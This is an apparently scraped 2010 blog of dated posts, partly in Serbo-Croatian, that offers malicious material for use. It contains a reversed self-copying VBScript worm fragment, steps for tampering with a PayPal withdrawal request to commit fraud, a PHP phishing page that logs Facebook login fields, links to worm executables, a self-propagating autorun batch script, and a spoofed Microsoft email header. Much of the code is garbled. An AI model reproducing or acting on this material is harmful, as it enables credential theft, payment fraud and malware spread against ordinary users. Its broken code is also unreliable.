')"sbv." & htaP.1f( ypoC.f
'fI dnE
'txeN
'buS dnE
')cepsredlof(ihih buS
'txeN emuseR rorrE nO
'osf ,fs ,1f ,f miD
')"tcejbOmetsySeliF.gnitpircS"(tcejbOetaerC = osf teS
')cepsredlof(redloFteG.osf = f teS
'sredloFbuS.f = fs teS
'fs nI 1f hcaE roF
')htaP.1f( eheh
')htaP.1f( ihih
'txeN
'buS dnE
četvrtak, travanj 8, 2010
Moguce je preko paypal opcije to uraditi, potrebno je samo
znati kako da kreirate paypal internet racun zatim preko nekog sajta
koji vam daje virtual money u prevodu da objasnim ( virtualne chipove )
zaradite ih oko $ 20 dolara na primer i zatim skinite sa mozilla addons
https://addons.mozilla.org/en-US/firefox/addon/966
instalirajte restartujte browser i udjite na www.fastinvestpro.com
registrujte se opcijom account-a preko paypal zatim izaberite
opcije za daily plan plan koja je spojena sa instant withdrawal. nemojte samo ici
u bigger plans.
dajte deposit od $10 sa vaseg paypal gde vam je virtualni novac
i uradite sign out
sacekajte 1 minut i ulogujte se, zatim u vas account videcete
$ 10 dolara na vas account kliknite zatim opciju
withdrawal, enter amount $ 10
ali pre klika na dugme ( button )
udjite u firefox browser tools koji ste skinuli kliknite tamper data
i malo prozorce startuje tamper(ne zatvarati ovo ) udjite u withdrawal page i kliknite request
zatim sledeci windows(prozor) Tamper uz request se otvara i kliknite tamper
zatim se drugi windows otvara, i levo
nacicete parameter value zatim u broj 10.00 stavite 99.00 ne stavljati preko 99 jer opcija
koju sadrzi bug
nacinjena je za samo 2 digitalna broja
Udjite u vas account na paypal i videcete prebaceni novac.
PAZLJIVO OVO URADITI JER MOZETE UZGUBITI I BONUS OD $5 KOJI STE PREBACILI
ZATO IPAK ODRADITE $50 VIRTUALNOG NOVCA NA RACUN PAYPAL
I TO MOZETE SAMO DVA PUTA PREBACITI PREKO VIRTUALNOG KOMPJUTERA
I ADMINISTRATOR-skog....
srijeda, travanj 7, 2010
A worm is a malware that is designed to propagate and spread across networks.
Worms are known to propagate using one or several of different transmission vectors
on the email, IRC, network shares, instant messengers (IM), and peer-to-peer (P2P) networks.
Worms do not infect files, but may carry one and more payloads,
such as computer security compromise and information theft.
Worms typically modify system settings to automatically start.
Worm after start cannot be terminated.
[ DOWNLOAD ] - www.4shared.com/file/258603683/10ad2366/Eldorado131.html
utorak, ožujak 30, 2010
Example way to get login with fake html and also
get ip address for worm ride can try from your own server.
Everybody know how look page application and blue button
in that way, put your Koobface.ara and when stupid people
click at blue button worm start open some application
wher first time you go and grab html code enter on the other side,
and rename location of real link then put your server.
That code is :
- -
<?php
header ('Location: http://www.facebook.com/user info/');
$handle = fopen("Setup.exe", "ara");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
$date = date('');
$ip = getIP();
exit;
?>
- -
You can add other page at facebook like '/heart&embrace/' or
'/Google video Reader/' Don't forgot add this setup.exe
from this trial share way http://www.speedyshare.com/files/21690946/Setup.exe
nedjelja, ožujak 21, 2010
From: "Microsoft Window Mail Team" <
osoft@microsoft.com>
To: "Windows Mail User" <@microsoft.com>
Subject: Welcome to Windows Mail
Date: Sun, 29 Dec 1978 13:34:34 -0700
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_0000_01CAC8FC.3FCF2B70"
X-MimeOLE: Produced By Microsoft MimeOLE V7.0.7000.06660
X-EsetId: DEA99D2831FE7D69C1AF9D7D3DA539
X-EsetScannerBuild: 6791
This is a multi-part message in MIME format.
Pročitaj kompletan post
utorak, ožujak 16, 2010
This Virus work on Xp&Vista
Pročitaj kompletan post
petak, ožujak 5, 2010
nesto sam testirao pa pronasao sasvim dobar nacin ubacivanja infekcije,
kroz batch kojeg sam nazvao command prompt ekstenzijom ukljucuje dopunu
u vista O.S i ubacuje bag ...
cls
type %0 "C:\autorun.cmd"
for %a in ("*.cmd") do call %0 C:\autorun.cmd
if %bug% x -t"%remote_address%" -y+ %bug%
move %bug% in %remote_address%
..\windowsupdatess.exe x -t"%remote_address%" -y+ file:\\\autorun.cmd
REG ADD HKCU\Software\Sysinternals\Autorun /v EulaAccepted /t REG_DWORD /d 1 /f
start "" "%remote_address%\autorun.cmd"
subota, veljača 27, 2010
Chat bar hacked is !
Da i to veoma ne zasticenim kodom a ujedno se moze spijunirati tudja chat
privatnost ukoliko znate raditi sa Id korisnickim kodom odnosno linkom faceuser
I' show u code in jscript :
| http://www.facebook.com/presence/popout.php?init_port=5312 |
Full window? yes if you work with your upgraded code. But all for this is greatz port !
inace druge uloge scripting-a mozete sami dodavati .
četvrtak, veljača 25, 2010
Vecina zeli na najbrzi nacin zaraditi preko interneta jedan od nacina
je dobar dok drugi sebe prestavlja i kao fake, dobar nacin je legalnost
zarade jer ocekuje klik ali ne na sajtove vec na vas izabrani sajt i nemora se niko
logovati.
Drugi nacin zahteva poznavanje script-e i znanje komunikacije odnosno u ovom
slucaju poznavanje zapisa .... lako je u koliko procitate deo po deo ...
LINK: http://adf.ly or look hostbux.com
srijeda, veljača 24, 2010
Command Prompt (DOS) batch files
Batch files are the oldest scripts and probably the easiest to write on a
PC, but they’re severely limited in what they can do. Batch files, not to
mention the Command Prompt itself, are handy for copying or renaming
files based on wildcard character specifications, for instance. But
they can’t interact with Windows programs, and have no knowledge of
running processes, security policies, or any of your other favorite Vista
buzzwords. On the plus side, you can run a batch file on any PC made
after 1982, regardless of the version of Windows being used, and the
DOS commands used therein can also be used to recover your PC in the
event it won’t start.
Windows Script Host scripts
WSH scripts are more flexible and powerful than batch files, and offer
better user interaction. WSH scripts are Windows-based, and can take
advantage of Windows services, such as printing, networking, and Registry
access. WSH scripts work on any PC running Windows 98 or later,
or Windows 95 and Windows NT 4.0 after installing an add-on. Unfortunately,
these days they’re seen as a system vulnerability, to the point
of being blocked by some modern antivirus software, and despite having
been around for about a decade, they’re still pretty feeble when
compared to the kind of scripting found on Unix/Linux systems.
Windows PowerShell scripts
Designed to address the shortcomings of WSH scripts, Microsoft’s
PowerShell (also known as MSH, or the Monad Shell) is somewhat the
ideal scripting solution. PowerShell is more or less a replacement for the
Command Prompt, and its scripting feature is only part of the package.
In some cases, even a single line entered by hand at the PowerShell
prompt can do more than a complex batch file or WSH script. But since
PowerShell is not installed by default in Vista, you can’t ever assume it’s
there, thus making it more useful as a personal tool than as a platform
for scripts to distribute to other PCs.
Which scripting platform you choose should depend on your comfort level
and familiarity with the language, as well as the task.
Port Number Description
20–21 FTP (File Transfer Protocol)
22 SSH (Secure Shell)
23 Telnet
25 SMTP (Simple Mail Transfer Protocol), used for sending email
42 WINS (Windows Internet Name Service)
43 WhoIs
50–51 IPSec (PPTP Passthrough for VPN, Virtual Private Networking)
53 DNS (Domain Name Server), used for looking up domain names
67 DHCP (Dynamic Host Configuration Protocol)
69 ? TFTP
70 Gopher
79 Finger
80 HTTP (Hyper Text Transfer Protocol), used by web browsers to download standard web pages
110 POP3 (Post Office Protocol, version 3), used for retrieving email
119 NNTP (Network News Transfer Protocol), used for newsgroups
123 NTP (Network Time Protocol), used for Windows’ Internet Time feature
135 ? RPC (Microsoft Windows Remote Procedure Call)
137–139 ? NETBIOS Services
143 IMAP4 (Internet Mail Access Protocol version 4)
161–162 SNMP (Simple Network Management Protocol)
194 IRC (Internet Relay Chat)
220 IMAP3 (Internet Mail Access Protocol version 3)